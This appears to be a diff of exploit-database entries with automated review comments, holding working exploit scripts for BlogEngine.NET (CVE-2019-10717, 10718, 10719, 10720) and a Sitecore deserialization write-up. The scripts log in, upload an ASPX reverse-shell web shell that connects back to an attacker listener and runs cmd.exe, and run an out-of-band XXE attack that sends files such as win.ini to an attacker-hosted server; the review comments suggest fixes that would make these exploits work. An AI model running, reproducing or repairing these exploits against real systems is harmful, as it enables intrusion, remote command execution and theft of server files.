https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh
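Review bot: the title says Cross-Site Request Forgery, but the script issues a direct `curl -X POST` to `http://$host/goform/formEMR30` with no session cookie and no victim browser involved, so as written it reads as a direct request rather than a forged one; the classification should match what the script does and what CVE-2020-10181 describes. The success check is also loose: `grep -i "0"` keeps any line containing a zero before `grep -q "0</html>"` is applied, so the first grep adds nothing. The script has no shebang line and no `set -e`, and the `read -p "Set password: " pass` prompt echoes the password to the terminal; `read -s` would avoid that.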


@ -0,0 +1,14 @@
# Exploit Title: Sitecore v 8.x Deserialization RCE
# Date: Reported to vendor October 2018, fix released April 2019.
# Exploit Author: Jarad Kopf
# Vendor Homepage: https://www.sitecore.com/
# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx
# Version: Sitecore 8.0 Revision 150802
# Tested on: Windows
# CVE : CVE-2019-11080
Exploit:
Authentication is needed for this exploit. An attacker needs to login to Sitecore 8.0 revision 150802's Admin section.
When choosing to Serializeusers or domains in the admin UI, calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx will include a CSRFTOKEN parameter.
By replacing this parameter with a URL-encoded, base64-encoded crafted payload from ysoserial.net, an RCE is successful.
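Review bot: `# Date: Reported to vendor October 2018, fix released April 2019.` holds a disclosure timeline rather than a date, and no fixed Sitecore version is named, so readers cannot tell whether a given 8.x build is patched for CVE-2019-11080; move the timeline to a Reference or Notes line and add the fixed revision. `Serializeusers` in the description should be `Serialize users`, and `# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx` doubles the label.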

exploits/aspx/webapps/47010.py Executable file

@ -0,0 +1,227 @@
# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10719
#1. Description
#==============
#BlogEngine.NET is vulnerable to an Directory Traversal on `/api/upload` which allows a RCE through the `theme` parameter.
#2. Proof of Concept
#=============
#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`; exploit the directory traversal to upload the shell into the **/Custom/Themes** #directory:
#~~~
#POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085
#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"
#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>
#<script runat="server">
#static System.IO.StreamWriter streamWriter;
# protected override void OnLoad(EventArgs e) {
# base.OnLoad(e);
#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#using(System.IO.Stream stream = client.GetStream()) {
#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#streamWriter = new System.IO.StreamWriter(stream);
#StringBuilder strInput = new StringBuilder();
#System.Diagnostics.Process p = new System.Diagnostics.Process();
#p.StartInfo.FileName = "cmd.exe";
#p.StartInfo.CreateNoWindow = true;
#p.StartInfo.UseShellExecute = false;
#p.StartInfo.RedirectStandardOutput = true;
#p.StartInfo.RedirectStandardInput = true;
#p.StartInfo.RedirectStandardError = true;
#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#p.Start();
#p.BeginOutputReadLine();
#while(true) {
#strInput.Append(rdr.ReadLine());
#p.StandardInput.WriteLine(strInput);
#strInput.Remove(0, strInput.Length);
# } } } } }
# private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
# StringBuilder strOutput = new StringBuilder();
# if (!String.IsNullOrEmpty(outLine.Data)) {
# try {
# strOutput.Append(outLine.Data);
# streamWriter.WriteLine(strOutput);
# streamWriter.Flush();
#} catch (Exception err) { }
# }
# }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
#-----------------------------12143974373743678091868871063--
#~~~
#The RCE can be triggered by setting the **theme** parameter to **RCE_TEST**: $RHOST/?theme=RCE_Test
#==============================
import argparse
import io
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10719
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Upload and trigger a reverse shell
python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337
Open a listener to capture the reverse shell - Metasploit or netcat
nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, params={}, data={}, files={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=params)
elif method == 'POST':
if files:
r = requests.Request(method, target, files=files)
else:
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)
def upload_shell(session, target, shell_dir, listener):
try:
lhost, lport = listener.split(':')
except:
print(target, " is not in the correct HOST:PORT format")
sys.exit(1)
shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
make_request(session, "POST", target + "/api/upload?action=filemgr&dirPath=~/App_Data/files/../../Custom/Themes/" + shell_dir, files={"file": ("PostView.ascx".format(shell_dir=shell_dir), shell, "application/octet-stream")})
def trigger_shell(session, target, shell_dir):
make_request(session, "GET", target + "/", params={"theme": shell_dir})
def main(target, user, passwd, shell_dir, listener):
with requests.Session() as session:
login(session, target, user, passwd)
upload_shell(session, target, shell_dir, listener)
trigger_shell(session, target, shell_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10719 Path traversal + RCE')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-d', '--dir', nargs='?', default="RCE", help='Theme Directory to write Reverse shell too')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
main(protocol + args.target, args.user, args.passwd, args.dir, args.listener)
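Review bot: `make_request` hardcodes `proxies = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}` and passes them on every `session.send(prep, verify=False, proxies=proxies)`, so the script fails with a connection error unless a local proxy is listening; either document that requirement or make the proxy an option. In `upload_shell`, the failure message `print(target, " is not in the correct HOST:PORT format")` names `target` although it is `listener` that failed to split, and because `--listener` is not `required=True` a missing argument raises AttributeError inside the bare `except` and produces the same misleading message. Minor: `"PostView.ascx".format(shell_dir=shell_dir)` is a no-op, `io`, `json` and `os` are imported but unused, the mutable defaults `params={}, data={}, files={}` should be `None`, and `# CVE : 2019-10719` omits the `CVE-` prefix.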

exploits/aspx/webapps/47011.py Executable file

@ -0,0 +1,227 @@
# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10720
#1. Description
#==============
#BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE.
#2. Proof of Concept
#=============
#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`:
#~~~
#POST /api/upload?action=filemgr HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085
#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"
#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>
#<script runat="server">
#static System.IO.StreamWriter streamWriter;
# protected override void OnLoad(EventArgs e) {
# base.OnLoad(e);
#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#using(System.IO.Stream stream = client.GetStream()) {
#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#streamWriter = new System.IO.StreamWriter(stream);
#StringBuilder strInput = new StringBuilder();
#System.Diagnostics.Process p = new System.Diagnostics.Process();
#p.StartInfo.FileName = "cmd.exe";
#p.StartInfo.CreateNoWindow = true;
#p.StartInfo.UseShellExecute = false;
#p.StartInfo.RedirectStandardOutput = true;
#p.StartInfo.RedirectStandardInput = true;
#p.StartInfo.RedirectStandardError = true;
#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#p.Start();
#p.BeginOutputReadLine();
#while(true) {
#strInput.Append(rdr.ReadLine());
#p.StandardInput.WriteLine(strInput);
#strInput.Remove(0, strInput.Length);
# } } } } }
# private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
# StringBuilder strOutput = new StringBuilder();
# if (!String.IsNullOrEmpty(outLine.Data)) {
# try {
# strOutput.Append(outLine.Data);
# streamWriter.WriteLine(strOutput);
# streamWriter.Flush();
#} catch (Exception err) { }
# }
# }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
#-----------------------------12143974373743678091868871063--
#~~~
#Trigger the RCE by setting the **theme** cookie to **../../App_Data/files/2019/06/** and browsing to any page on the application; authentication is not required to trigger the RCE.
=================================
import argparse
import io
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10719
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Upload and trigger a reverse shell
python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337
Open a listener to capture the reverse shell - Metasploit or netcat
nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, params={}, data={}, files={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=params)
elif method == 'POST':
if files:
r = requests.Request(method, target, files=files)
else:
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)
def upload_shell(session, target, listener):
try:
lhost, lport = listener.split(':')
except:
print(target, " is not in the correct HOST:PORT format")
sys.exit(1)
shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
make_request(session, "POST", target + "/api/upload?action=filemgr", files={"file": ("PostView.ascx", shell, "application/octet-stream")})
def trigger_shell(session, target):
import datetime
now = datetime.datetime.now().strftime("%Y/%m/")
requests.get(target + "/", cookies={"theme": "../../App_Data/files/{}".format(now)})
def main(target, user, passwd, listener):
with requests.Session() as session:
login(session, target, user, passwd)
upload_shell(session, target, listener)
trigger_shell(session, target)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
main(protocol + args.target, args.user, args.passwd, args.listener)
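Review bot: the file will not parse as submitted: `=================================` at the end of the comment block is missing its leading `#` (the corresponding line in 47010.py is commented), so Python raises a SyntaxError before anything runs. The module docstring also still reads `Exploit for CVE-2019-10719` while the header and the argparse description say CVE-2019-10720, and the docstring usage line and the hardcoded `proxies` in `make_request` are copied unchanged from 47010.py. `trigger_shell` calls `requests.get(...)` directly rather than going through `session`/`make_request`, so that one request skips the proxy and session settings every other request uses; if that is intended it should be said, and `import datetime` belongs with the other imports.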

exploits/aspx/webapps/47014.py Executable file

@ -0,0 +1,190 @@
# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET
# Date: 19 June 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10718
#1. Description
#==============
#BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity
#Injection attack on **/pingback.axd**.
#2. Proof of Concept
#=============
#Host the following malicious DTD on a web server that is accessible to the
#target system:
#~~~
#<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini">
#<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2
#~~~
#Submit a request to `pingback.axd` containing a malicious XML body:
#~~~{command="REQUEST"}
#POST /pingback.axd HTTP/1.1
#Host: $RHOST
#Accept-Encoding: gzip, deflate
#Connection: close
#User-Agent: python-requests/2.12.4
#Accept: */*
#Content-Type: text/xml
#Content-Length: 131
#<?xml version="1.0"?>
#<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd">
#<foo>&e1;</foo>
#<methodName>pingback.ping</methodName>
#~~~
#The application will request the remote DTD and submit a subsequent request
#containing the contents of the file:
#~~~
#$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 -
#$RHOST - - [17/May/2019 12:03:32] "GET
#/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1
#HTTP/1.1" 200 -
#~~~
#! /usr/bin/env python3
import argparse
import http.server
import json
import multiprocessing
import os
import re
import requests
import sys
import time
import urllib
"""
Exploit for CVE-2019-10718
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Submit a XML to the target, get the contents of the file in a follow up request from the target
python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt
Requesting C:/Windows/win.ini ...
$RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 -
Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ...
$RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config
Requesting C:/inetpub/wwwroot/iisstart.htm ...
$RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/inetpub/wwwroot/iisstart.htm
Requesting C:/Windows/iis.log ...
$RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Windows/iis.log
Requesting C:/Users/Public/test.txt ...
$RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 -
"""
xml = """<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd">
<foo>&e1;</foo>
<methodName>pingback.ping</methodName>
"""
dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2;
"""
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
file_queue = multiprocessing.Queue()
response_queue = multiprocessing.Queue()
response_counter = multiprocessing.Value('i', 0)
class S(http.server.SimpleHTTPRequestHandler):
server_version = 'A Patchey Webserver'
sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
error_message_format = 'Donde esta la biblioteca?'
def _set_headers(self):
self.send_response(200)
self.send_header('Content-Type', 'application/xml')
self.end_headers()
def do_GET(self):
if self.path.endswith(".dtd"):
self._set_headers()
self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8'))
elif self.path.startswith("/X"):
self._set_headers()
response_counter.value += 1
response_queue.put(self.path)
self.wfile.write('<response>Thanks</response>'.encode('utf-8'))
else:
self._set_headers()
self.wfile.write('<error>?</error>')
def start_server(lhost, lport, server):
httpd = http.server.HTTPServer((lhost, lport), server)
httpd.serve_forever()
def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
print(output_dir)
if not output_dir:
return
for f in files:
file_queue.put_nowait(f)
server = S
server.lhost, server.lport = lhost, lport
p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
p.start()
for num, f in enumerate(files):
print("\nRequesting {} ...".format(f))
count = 0
r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
response = True
while num == response_counter.value:
if count >= timeout:
response = False
response_counter.value += 1
print("Unable to read {}".format(f))
break
time.sleep(1)
count += 1
if response:
os.makedirs(output_dir, exist_ok=True)
with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))
p.terminate()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory. Default ./CVE-2019-10718')
args = parser.parse_args()
if isinstance(args.files, str):
args.files = [args.files]
main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)
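Review bot: the fallback branch of `do_GET` writes a `str` to the socket (`self.wfile.write('<error>?</error>')`) while the other two branches `.encode('utf-8')`; under the `#! /usr/bin/env python3` shebang that raises `TypeError` for any request whose path is neither `.dtd` nor `/X`, so encode it like the other branches. `-o/--output` uses `nargs='?'` with no `const`, so passing `-o` without a value sets `output_dir` to `None` and `main` silently returns right after the leftover debug `print(output_dir)`; add `const="./CVE-2019-10718"` (or drop `nargs`) and remove the print. The hard-coded `127.0.0.1:8080` proxy behind `-x` should be named in that option's help string so the reader knows what the flag assumes.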

183
exploits/aspx/webapps/47035.py Executable file

@ -0,0 +1,183 @@
# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717
1. Description
==============
BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.
2. Proof of Concept
=============
Log in to the application and submit a GET request to /api/filemanager:
Request:
~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: $COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
~~~
Depending on how the request is submitted, the response may be XML or JSON
XML Response
~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 01:58:46 GMT
Connection: close
Content-Length: 13030
<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
<FileInstance>
<Created>5/14/2019 6:58:46 PM</Created>
<FileSize></FileSize>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../..</FullPath>
<IsChecked>false</IsChecked>
<Name>...</Name>
<SortOrder>0</SortOrder>
</FileInstance>
...
~~~
JSON Response
~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 02:35:13 GMT
Connection: close
Content-Length: 10011
[
{
"IsChecked":false,
"SortOrder":0,
"Created":"5/14/2019 7:35:13 PM",
"Name":"...",
"FileSize":"",
"FileType":0,
"FullPath":"~/App_Data/files/../..",
"ImgPlaceholder":""
}
...
~~~
import argparse
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10717
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Outputs list of filenames found in web root
python exploit.py -t $RHOST
?path=/../..
/../../archive.aspx
/../../archive.aspx.cs
/../../archive.aspx.designer.cs
/../../BlogEngine.NET.csproj
/../../BlogEngine.NET.csproj.user
/../../contact.aspx
/../../contact.aspx.cs
/../../contact.aspx.designer.cs
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, data={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=data)
elif method == 'POST':
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), login_data)
def parse(body, path, outfile):
paths = json.loads(body)
new_paths = set()
for i in paths:
if i.get('FileType') == 0:
new_paths.add(i.get('FullPath'))
else:
outfile.write("{path}\n".format(path=i.get('FullPath')))
return new_paths
def traverse(session, host, paths, outfile, visited=set()):
paths = set(paths) - visited
for path in paths:
print path
outfile.write("\n?path={path}\n".format(path=path))
visited.add(path)
resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
new_paths = parse(resp, path, outfile)
if new_paths:
traverse(session, host, new_paths, outfile, visited)
def main(host, user, passwd, root, outfile):
with requests.Session() as s:
login(s, host, user, passwd)
traverse(s, host, root, outfile)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
if isinstance(args.root, str):
args.root = [args.root]
main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)
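Review bot: `print path` is Python 2 syntax, so this file is a `SyntaxError` on Python 3 while the sibling entry for the same product ships a `#! /usr/bin/env python3` shebang and the usage line here says only `python exploit.py -t $RHOST`; use `print(path)`, which works on both, and add a shebang that states the interpreter. The description names the `page` parameter, but the request, `parse` and `traverse` all use `path`; fix the description. `parse` calls `json.loads` on every response although the write-up says the API answers XML or JSON depending on how the request is submitted and `make_request` sends no `Accept` header, so the JSON form is assumed rather than requested. `make_request` also routes every request through `127.0.0.1:8080` unconditionally (the other script gates this behind `-x`), so without a local proxy listening the script fails on the first request.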


@ -0,0 +1,27 @@
# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
# Date: July 11, 2019
# Exploit Author: Owais Mehtab
# Vendor Homepage: http://www.sitecore.net/en
# Version: 9.0 rev. 171002
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2019-13493
Vendor Description
------------------
